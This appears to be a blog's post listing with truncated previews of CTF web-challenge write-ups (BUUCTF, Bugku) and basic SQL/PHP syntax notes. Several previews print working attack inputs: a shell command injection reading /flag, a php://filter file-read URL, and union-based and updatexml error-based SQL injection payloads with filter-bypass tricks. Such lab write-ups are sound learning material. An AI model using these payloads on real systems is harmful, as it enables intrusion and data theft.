- 博客(11)
- 收藏
- 关注
RSS订阅原创 buu几道题的wp
【Buu】[BJDCTF2nd]elementmaster翻译图片文字,得到要素:118元素检查页面,发现两个十六进制,翻译得到Po.php访问发现里面只有一个点考虑到Po为元素名,可能要遍历化学元素import requestsimport timeurl='http://c0c35ceb-d134-4829-b954-83b4d9c69807.node3.buuoj.cn/'flag=''element=['H', 'He', 'Li', 'Be', 'B', 'C', 'N',
2021-02-01 02:55:47
539
原创 [极客大挑战 2019]HTTP
[极客大挑战 2019]HTTP进入题目检查中发现Secret.php必须从这个https://www.Sycsecret.com点过来的才有效修改RefererReferer: https://www.Sycsecret.com浏览器需要使用Syclover才行修改User-AgentUser-Agent: Syclover/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0(→_→) 还
2021-01-25 00:49:22
150
原创 【buu平台】[GXYCTF2019]BabySQli
【buu平台】[GXYCTF2019]BabySQli查看页面源代码发现search.php,文件中有一段base32编码[base32是由大写字母和数字构成,其结尾有三个等号,base64由大小写字母和数字构成,结尾最多两个等号]解码得到一串base64,再解码得到select * from user where username = ‘$name’接下来使用联合注入,以成功登录name=1' union select 0,'admin','81dc9bdb52d04dc20036dbd8
2021-01-25 00:05:10
410
原创 buuctf [ACTF2020 新生赛]Exec
buuctf [ACTF2020 新生赛]Exec尝试寻找包含flag的flag文件127.0.0.1;cat /flag得到
2021-01-24 22:47:29
127
原创 [BUUCTF][ACTF2020 新生赛]Include
[BUUCTF][ACTF2020 新生赛]Include点开tips想到php://伪协议构造相应url?file=php://filter/read=convert.base64-encode/resource=flag.php得到dase64解码即可得到题解
2021-01-24 22:01:48
96
原创 [极客大挑战 2019]HardSQL
[极客大挑战 2019]HardSQL打开靶机试下万能密码和双写绕过使用报错注入,使用()来代替空格,使用like来代替=号先爆库名check.php?username=admin&password=1'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23查表:check.php?username=admin&password=1'or(updatexml(1,concat(0x7e,(select(group_concat(
2021-01-24 17:27:08
119
原创 SQL基础语法
SQL基础语法1.基础语句以分号结尾,/* */插入多行注释表的创建创建数据库:create database<数据库名>;创建表:create table <表名>(列的设置);常用约束default默认值约束primary key主键约束not null非空值约束常用数据类型char字符串varchar可变长度的字符串integer整数date日期表的删除和更新删除表:drop table <表名>
2021-01-24 16:44:18
77
原创 BUUCTF [极客大挑战 2019] BabySQL
BUUCTF [极客大挑战 2019] BabySQL打开环境尝试万能密码登录1' or 1=1#根据报错信息,关键字or被屏蔽,尝试双写绕过1' oorr 1=1#查询字段数/check.php?username=1' uniunionon selselectect 1,2,3,4 %23&password=1判断字段数为3,查询回显点位:/check.php?username=1' uniunionon selselectect 1,2,3 %23&
2021-01-17 21:06:42
192
原创 CTF之Bugku 秋名山老司机
CTF之Bugku 秋名山老司机进入环境两秒内算出结果,手工算是不可能的,所以要用脚本import reimport requestsurl = 'http://114.67.246.176:15352/'r = requests.session()requestpage = r.get(url)ans = re.findall('<div>(.*?)=?;</div>', requestpage.text)ans = "".join(ans)ans = ans[
2021-01-10 18:44:08
299
原创 攻防世界web新手题get_post
攻防世界web新手题get_postget 和 post请求是http协议中的两种请求方式,get一般用来获取服务器的信息的,post一般是用来更新信息的1. 以get提交a=1get请求的数据会附在URL之后(就是把数据放置在HTTP协议头中),以?分割URL和传输数据,参数之间以&相连得到2. 以post方式提交b=2这里需要用到一个火狐浏览器插件Max HacKBar,提交b=2即可得到flag...
2021-01-10 17:52:17
1353
原创 PHP基础语法
PHP基础语法最基础语法PHP代码标记:标准记法 <? php 代码 ?>PHP语句分隔符:代码以行为单位,用常用;表示结束。注:?>有自带语句结束符的效果,最后一行PHP代码可以没有语句结束符。1.变量变量的定义:变量名前需加符号,使用时也要带有符号,使用时也要带有符号,使用时也要带有符号变量名可由数字、字母、下划线命名,但不能以数字开头允许中文变量名,但不建议这么做预定义变量 即提前定义的变量,由系统定义的变量,存储许多要用到的数据(预定义变量都
2021-01-10 17:15:29
172
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人